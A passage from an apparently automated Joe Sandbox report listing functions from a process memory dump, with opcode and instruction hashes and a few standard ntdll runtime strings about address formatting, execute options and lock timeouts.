                                                                • Opcode Fuzzy Hash: a5e8a86e94dffcf58d2a839962cd2eafff6a87ceb2078f9ed777b8012163af36
                                                                • Instruction Fuzzy Hash: EC90022130140003D544725855186065015E7E1301F55D111F0419554CDA1589576322
                                                                Function 01122DB0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 30d448eaf55e00fabdf3e1bfd868902564dbd63f02d08b8ab1691f7f02bae438
                                                                • Instruction ID: fc66499530c9f3f3f686a5d950aa9c4fdb9eda602239733b8d1c8ecb13a2960e
                                                                • Opcode Fuzzy Hash: 30d448eaf55e00fabdf3e1bfd868902564dbd63f02d08b8ab1691f7f02bae438
                                                                • Instruction Fuzzy Hash: 1190023124140402D545725845046061019A7D0241F95C112B0429554EC7558B57BB61
                                                                Function 01122DD0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b8adf9a2d0e7ad91bb7b05d03543695bbfc072c0f598a113b1f2492abd4341d7
                                                                • Instruction ID: 2a25d83f32d339427fa11ad794eea1aa375fd95d2761ab462bd092d80b41740f
                                                                • Opcode Fuzzy Hash: b8adf9a2d0e7ad91bb7b05d03543695bbfc072c0f598a113b1f2492abd4341d7
                                                                • Instruction Fuzzy Hash: 73900221242441525949B25845045075016A7E0241795C112B1419950CC6269957E721
                                                                Function 01122C60 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5e512248a5c922da6e032cf67b62ab6e48ee963d3077cd7ba47bd912b79da2b5
                                                                • Instruction ID: ebfde6ba96d2d913593cc40c9a9cbfe777380316116104fbea2a1454fe7863f8
                                                                • Opcode Fuzzy Hash: 5e512248a5c922da6e032cf67b62ab6e48ee963d3077cd7ba47bd912b79da2b5
                                                                • Instruction Fuzzy Hash: F490023120140842D50472584504B46101597E0301F55C116B0129654DC715C9527621
                                                                Function 01122CA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50f97da7f2ddfd2e2d54f72ad24b7da44db8fcf68d034c500a1b69be39cc7c55
                                                                • Instruction ID: 713f75fb12a0a64b79bc65ff0bfa875ae95f2e176ba19aed0129c6942c856735
                                                                • Opcode Fuzzy Hash: 50f97da7f2ddfd2e2d54f72ad24b7da44db8fcf68d034c500a1b69be39cc7c55
                                                                • Instruction Fuzzy Hash: 1D90023120140402D50476985508646101597E0301F55D111B5029555EC76589927231
                                                                Function 01122CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 69dd40b7851e268521bbb3429e662fc674155528042e85aeaf7b38ded5c80a9f
                                                                • Instruction ID: 2569e9a48c3650ef838e24831272894dfa19aae212a1611355e92dc4ea9dc95a
                                                                • Opcode Fuzzy Hash: 69dd40b7851e268521bbb3429e662fc674155528042e85aeaf7b38ded5c80a9f
                                                                • Instruction Fuzzy Hash: 2990022160540402D54472585518706102597D0201F55D111B0029554DC7598B5677A1
                                                                Function 01122CF0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d41c16fe4ccc4b2e13dbd56afd0270d7f56183dc28e3fa2d958cb1dc77443e98
                                                                • Instruction ID: 21ea8ae24a102b0dbde3c29e0786a257ffd9d4a72039e317812104b7929131d7
                                                                • Opcode Fuzzy Hash: d41c16fe4ccc4b2e13dbd56afd0270d7f56183dc28e3fa2d958cb1dc77443e98
                                                                • Instruction Fuzzy Hash: 3E90023120140403D50472585608707101597D0201F55D511B0429558DD75689527221
                                                                Function 01122F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: efa36d3617d63f8221cbc65e6d631fd29ad0513a689b6d97c773f1629720ea35
                                                                • Instruction ID: 383a0bbd69c38f3c9921849085b73a02c8dc928e5529a819e8f329c6d6c90032
                                                                • Opcode Fuzzy Hash: efa36d3617d63f8221cbc65e6d631fd29ad0513a689b6d97c773f1629720ea35
                                                                • Instruction Fuzzy Hash: 7990026134140442D50472584514B061015D7E1301F55C115F1069554DC719CD537226
                                                                Function 01122F60 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 134cefada03e52d3cad42426ed0764cc34e668806a0d3de2fe408b785e2b845e
                                                                • Instruction ID: 71227181ca39ca40eea03106fee76463b4d920534f58fc2fd55f5a1f5bd161d9
                                                                • Opcode Fuzzy Hash: 134cefada03e52d3cad42426ed0764cc34e668806a0d3de2fe408b785e2b845e
                                                                • Instruction Fuzzy Hash: 9690026121140042D50872584504706105597E1201F55C112B2159554CC6298D626225
                                                                Function 01122F90 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f211320b54e7e7c8453c121357bf925873456074e2bb461925ad2d369ab680c
                                                                • Instruction ID: 9aa3756ae966fd197ef13c09d3569f9e8bca14617e164dba50b3b883d3211ef5
                                                                • Opcode Fuzzy Hash: 5f211320b54e7e7c8453c121357bf925873456074e2bb461925ad2d369ab680c
                                                                • Instruction Fuzzy Hash: CC90023120180402D5047258491470B101597D0302F55C111B1169555DC72589527671
                                                                Function 01122FB0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 98895d2d8b02a5578851adf942847111d155d21a814647727dfc2c9f80a8f43d
                                                                • Instruction ID: cb72f41feaaf53630dbd08be87b5f4c99dcd532bbea32f663734af484f4c9597
                                                                • Opcode Fuzzy Hash: 98895d2d8b02a5578851adf942847111d155d21a814647727dfc2c9f80a8f43d
                                                                • Instruction Fuzzy Hash: 5B900221601400424544726889449065015BBE1211755C221B099D550DC65989666765
                                                                Function 01122FA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a84bcf77c23056cdf75e8719cbea7e636d4528ad058a701d8434929e8184d888
                                                                • Instruction ID: 7220b99666c90cbff2a6915217fe5954957548a6dcbf91e0e6aac464ef7baef3
                                                                • Opcode Fuzzy Hash: a84bcf77c23056cdf75e8719cbea7e636d4528ad058a701d8434929e8184d888
                                                                • Instruction Fuzzy Hash: F590023120180402D50472584908747101597D0302F55C111B5169555EC765C9927631
                                                                Function 01122FE0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1628122504cbdfc071e0cd4bcf133a6b7f77c82d1c454cd3a138a3172d2fd93f
                                                                • Instruction ID: bd7970df9662b0d6d222ca49c487562dff2256d72461d0984430c6edb2d3fd5a
                                                                • Opcode Fuzzy Hash: 1628122504cbdfc071e0cd4bcf133a6b7f77c82d1c454cd3a138a3172d2fd93f
                                                                • Instruction Fuzzy Hash: A7900221211C0042D60476684D14B07101597D0303F55C215B0159554CCA1589626621
                                                                Function 01122E30 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c983adfcceb406411874b3f7fe0162f5f1b8af25c73e20319f3eddffe1aaa416
                                                                • Instruction ID: 5687dbda7fbcee2960db96d88cf7c3306c527c3e73d322567bd9750467d2256d
                                                                • Opcode Fuzzy Hash: c983adfcceb406411874b3f7fe0162f5f1b8af25c73e20319f3eddffe1aaa416
                                                                • Instruction Fuzzy Hash: 0E90022130140402D506725845146061019D7D1345F95C112F1429555DC7258A53B232
                                                                Function 01122E80 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a69942340cd2169772523caa9b7f927d17b1414d4b087a13e42272c783958162
                                                                • Instruction ID: 8003b64f0dc9d752dabc93af2f9886fb6f4775165420a7a0cf9a361fa1f4c415
                                                                • Opcode Fuzzy Hash: a69942340cd2169772523caa9b7f927d17b1414d4b087a13e42272c783958162
                                                                • Instruction Fuzzy Hash: DE90022160140502D50572584504616101A97D0241F95C122B1029555ECB258A93B231
                                                                Function 01122EA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1ec496814098b1f15d684bda1b39c9045e908d03cf8bb22e11b14d410d793423
                                                                • Instruction ID: a34b08e7fbc540839e25b7cefcb727a7151413a356cd60702d72e7e738594d22
                                                                • Opcode Fuzzy Hash: 1ec496814098b1f15d684bda1b39c9045e908d03cf8bb22e11b14d410d793423
                                                                • Instruction Fuzzy Hash: 1B90027120140402D54472584504746101597D0301F55C111B5069554EC7598ED67765
                                                                Function 01122EE0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 30ca6e966dc458a2916f6d536af1b20f91dd818f6bccf3e4824aff97192afb34
                                                                • Instruction ID: e807342d2a1b8b11a4fca19a2c9a4b18b0509fc8ef8af3204d1d055e024c1cd3
                                                                • Opcode Fuzzy Hash: 30ca6e966dc458a2916f6d536af1b20f91dd818f6bccf3e4824aff97192afb34
                                                                • Instruction Fuzzy Hash: 1190026120180403D54476584904607101597D0302F55C111B2069555ECB298D527235
                                                                Function 01123010 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b55be87c74bae159a0817de5cee0d97a6d79591f733b944cd6653dc0604dd0a
                                                                • Instruction ID: 604137c19ccb20da6d58de65e8028b590d87d61a9d4b9bace4adf1f947678754
                                                                • Opcode Fuzzy Hash: 0b55be87c74bae159a0817de5cee0d97a6d79591f733b944cd6653dc0604dd0a
                                                                • Instruction Fuzzy Hash: 2D90022120184442D54473584904B0F511597E1202F95C119B415B554CCA1589566721
                                                                Function 01123090 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 85d967234c11fcf6564e4f4c0273f033de02a7ab8591f56f53e617d3d4851241
                                                                • Instruction ID: 34556c01216f848d73309f172040eff93043feb1a1dee33804dcf34bfef0768d
                                                                • Opcode Fuzzy Hash: 85d967234c11fcf6564e4f4c0273f033de02a7ab8591f56f53e617d3d4851241
                                                                • Instruction Fuzzy Hash: 4090022124140802D544725885147071016D7D0601F55C111B0029554DC7168A6677B1
                                                                Function 011239B0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dcfa0622158bdc18373be59527d0ea22c1039160bc3435ddf0373cc0c399f491
                                                                • Instruction ID: 525b0f1733da42c9c53f71f954c20d27710312d81fd7fe1d10d58e40cae845da
                                                                • Opcode Fuzzy Hash: dcfa0622158bdc18373be59527d0ea22c1039160bc3435ddf0373cc0c399f491
                                                                • Instruction Fuzzy Hash: 1D90022124545102D554725C45046165015B7E0201F55C121B0819594DC65589567321
                                                                Function 01123D10 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d57f8fe117c3b41a6b1ad7d66abcf8ed7735d057733822a4f9c0f4342061abff
                                                                • Instruction ID: 4391c8840cc17950f8bf585dffee1b022dbf6b871abdaffa815e6c243babc7c6
                                                                • Opcode Fuzzy Hash: d57f8fe117c3b41a6b1ad7d66abcf8ed7735d057733822a4f9c0f4342061abff
                                                                • Instruction Fuzzy Hash: D990023120240142994473585904A4E511597E1302B95D515B001A554CCA1489626321
                                                                Function 01123D70 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa79d25c18d892a68700167fc2d9c24d6dc84b232b4cf9c69892b01b5b6fec7f
                                                                • Instruction ID: fad826390608d1e0167fe631d3c8683cfb470ff836eab1d5d9857e9b26670fa1
                                                                • Opcode Fuzzy Hash: fa79d25c18d892a68700167fc2d9c24d6dc84b232b4cf9c69892b01b5b6fec7f
                                                                • Instruction Fuzzy Hash: 9890023520140402D91472585904646105697D0301F55D511B0429558DC75489A2B221
                                                                Function 01122C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction ID: 726dc3782ba95212aeee1c4feb99d10722fa7f8f076b9c77ed02509e58077ced
                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction Fuzzy Hash:
                                                                Function 01122890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 73f8554a2f80d86eecd88ccfd1e9c1cb3b3e3e86d30db7f6c9506b490d94f51c
                                                                • Instruction ID: 3d1ab1ba42d3431bbace9a878765e3c2ec3461b4770cc69a7c9e42c2311879bf
                                                                • Opcode Fuzzy Hash: 73f8554a2f80d86eecd88ccfd1e9c1cb3b3e3e86d30db7f6c9506b490d94f51c
                                                                • Instruction Fuzzy Hash: 135109B1B00126BFCF29DB9C889097EFBF8BF482447548269F4A5D7641E374DE1087A1
                                                                Function 01192410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 22f5b67358be5399412d6b3c00cba0a68fb2447cf8282f89a19c25004e090812
                                                                • Instruction ID: 4af8b2a2434a88bb43fca54fa4326a60ac054a9ec30caf1723cb62b906145b03
                                                                • Opcode Fuzzy Hash: 22f5b67358be5399412d6b3c00cba0a68fb2447cf8282f89a19c25004e090812
                                                                • Instruction Fuzzy Hash: 2151F6B1A00645BEDF38DF9DC8909BFB7F8EB48200B048459E5E6C7682D7B4EA008760
                                                                Function 01117630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01154742
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01154725
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011546FC
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01154655
                                                                • ExecuteOptions, xrefs: 011546A0
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01154787
                                                                • Execute=1, xrefs: 01154713
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: b62a733d8bacb3c67bbeb7fd711880aeeaf6f14040fa31e7600235bd2275db53
                                                                • Instruction ID: 0fa7c9ae14c101c3b8694d3a4167c824a32976ab190ba8cbbe49be4c4d372df4
                                                                • Opcode Fuzzy Hash: b62a733d8bacb3c67bbeb7fd711880aeeaf6f14040fa31e7600235bd2275db53
                                                                • Instruction Fuzzy Hash: DD515D31A0021ABAEF1DAB69EC95FADB7A8EF14304F0404BDD605A72C1E7719A51CF51
                                                                Function 011B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction ID: ca467a4b960a3fa463a4856181c72118d84cf26875d4b8a8350ab5b930d76bb8
                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction Fuzzy Hash: EF021671508342AFD709DF28C590AAFBBE5EFD8704F04892DF9894B2A4DB31E945CB52
                                                                Function 0112B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction ID: f72e83b349979a8b038303e0979368c591869f61fed0101d9e1838481a82a22d
                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction Fuzzy Hash: 5981E170E096698EEF2DCF6CC8917FEBBB2AF45320F184119D861A72D1C7748860CB59
                                                                Function 011920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                • Opcode ID: de887844b1defb5c13ae3e5784e2e8b64c73c9cf2e150cda7c2f61ab0288d8b6
                                                                • Instruction ID: 4f0681a665998c7d34f6e753b86dae1aabe6749c6c7083e80edf2994465f52c3
                                                                • Opcode Fuzzy Hash: de887844b1defb5c13ae3e5784e2e8b64c73c9cf2e150cda7c2f61ab0288d8b6
                                                                • Instruction Fuzzy Hash: 022177BAE00119ABDF14DF79DC40AFEBBF8EF58654F050126E915D7200E730D9118BA1
                                                                Function 0110F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011502BD
                                                                • RTL: Re-Waiting, xrefs: 0115031E
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011502E7
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: 596f54e163a619f22dbc22ffc312e134d04d47a17846073b275aee00aa5527a1
                                                                • Instruction ID: 0e3ca7e340adb57b129b39efdd2025a12675ec487963de9496a22730d85b86da
                                                                • Opcode Fuzzy Hash: 596f54e163a619f22dbc22ffc312e134d04d47a17846073b275aee00aa5527a1
                                                                • Instruction Fuzzy Hash: DDE1A130A08742DFD76ECF68C885B5ABBE0BB88314F144A1DF5A58B2D1D7B4D946CB42
                                                                Function 0111BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 01157BAC
                                                                • RTL: Resource at %p, xrefs: 01157B8E
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01157B7F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_10b0000_r9856_7.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: 041842e0af9738b10ae8564eeeb457c3ace4a25b3530dd156926609255c11026
                                                                • Instruction ID: b8df556e2a93bc6356c54828ee51f75de5279588097722c21b58e25e1c528936
                                                                • Opcode Fuzzy Hash: 041842e0af9738b10ae8564eeeb457c3ace4a25b3530dd156926609255c11026
